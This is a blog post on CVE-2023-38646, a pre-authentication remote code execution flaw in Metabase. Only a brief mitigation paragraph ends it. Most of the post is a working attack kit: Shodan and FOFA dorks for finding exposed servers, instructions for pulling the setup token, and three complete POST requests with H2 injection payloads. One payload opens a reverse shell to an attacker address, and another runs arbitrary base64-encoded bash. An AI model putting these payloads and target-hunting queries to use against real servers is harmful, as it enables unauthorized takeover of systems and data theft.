Unveiling the Metabase Vulnerability: A Deep Dive into CVE-2023-38646

CVE-2023-38646, Metabase RCE: Metabase is a tools for business intelligence and data visualization thas has emerged as a preferred tool, seamlessly transforming data into insightful dashboards.

However, recent revelations have cast a spotlight on a significant security flaw within Metabase versions prior to 0.46.6.1 for the open-source variant and 1.46.6.1 for the Enterprise edition.

This vulnerability, labeled as CVE-2023-38646, has the potential to expose servers to arbitrary command execution by attackers, sans authentication.

About the Vulnerability

According to AssetNote Blog, the point of the vulnerability resides within the Metabase API endpoint: `/api/setup/validate`. This endpoint’s purpose is to validate database connections during the setup process. A setup token, generated upon Metabase initialization, is required to access this endpoint.

This token was meant to aid in the completion of the initial setup and should ideally be used once. However, through meticulous analysis, researchers stumbled upon an unexpected twist – the setup token remained accessible even after the setup phase, creating a potential gateway for exploitation.

Metabase Remote Code Execution

Moving beyond the initial setup token exposure, researchers embarked on a journey towards achieving reliable remote code execution (RCE). The `/api/setup/validate` endpoint accepted JDBC URIs, thereby opening avenues for exploitation through various database connectors.

While attempts to exploit H2 database’s INIT parameter were initially hindered, ingenious maneuvering led researchers to an SQL injection vulnerability within the H2 database driver. This newfound vulnerability allowed for code execution without relying on the previously obstructed INIT parameter.

Dork to Find Targets using Metabase

Shodan.io
– http.html:Metabase
– http.title:Metabase (twitter @win3zz)

FOFA app (twitter @HunterMapping)
FOFA app=”Metabase”
Shodan product:”Metabase”

Twitter @fofabot
FOFA Query: FOFA app=”Metabase”
Link: https://en.fofa.info/result?qbase64=YXBwPSJNZXRhYmFzZSI%3D

Proof Of Concept for CVE-2023-38646

To exploit this vulnerability manually, you can following this simple step:

1. Visit the /api/session/properties , and get the token from “setup-token”
2. You can use one of the three POST Requests below to reproduce the vulnerability I gathered from Twitter:

Using sample H2 database is provided inside Metabase’s JAR file: (recommended)

POST /api/setup/validate HTTP/1.1
Host: 
Content-Type: application/json
Content-Length: 812

{
    "token": "YOUR-TOKEN",
    "details":
    {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules":
        {},
        "details":
        {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,YOUR-BASE64}|{base64,-d}|{bash,-i}')\n$$--=x",
            "advanced-options": false,
            "ssl": true
        },
        "name": "an-sec-research-team",
        "engine": "h2"
    }
}

Using org.h2.driver, postgress

POST /api/setup/validate HTTP/1.1
Host: localhost:3000
Content-Length: 416
Accept: application/json
Content-Type: application/json
User-Agent: Mozilla/5.0 
Connection: close

{"token":"YOUR-TOKEN","details":{"details":{
"subprotocol":"h2",
"classname":"org.h2.Driver","advanced-options":true,
"subname":"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(new String[]{\"sh\", \"-c\", cmd})\\;}$$\\;CALL SHELLEXEC('bash -i >&/dev/tcp/IP-REVERSE/1337 0>&1');"},"name":"x","engine":"postgres"}}

Post Request 3: little bit similar with the first.

POST /api/setup/validate HTTP/1.1
Host: localhost:3000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 739

{
    "token": "YOUR-TOKEN",
    "details":
    {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules":
        {},
        "details":
        {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;",
            "advanced-options": false,
            "ssl": true,
"init": "CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\u000A\u0009java.lang.Runtime.getRuntime().exec('touch /tmp/success')\u000A$$"
        },
        "name": "an-sec-research-team",
        "engine": "h2"
    }
}

Other poc you can learn from this blog: https://blog.calif.io/p/reproducing-cve-2023-38646-metabase . Or you can use this tools https://github.com/robotmikhro/CVE-2023-38646

The Way Forward: Mitigation and Awareness

To address the CVE-2023-38646 vulnerability, Metabase released advisories and versions that offer remedies. Upgrading to versions 0.46.6.1 (open-source) and 1.46.6.1 (Enterprise) is the primary step to safeguard against potential exploitation. For instances where immediate upgrade isn’t feasible, blocking requests to `/api/setup` endpoints and meticulous monitoring are recommended steps. Additional insights, mitigation strategies, and release information can be accessed through Metabase’s official advisories.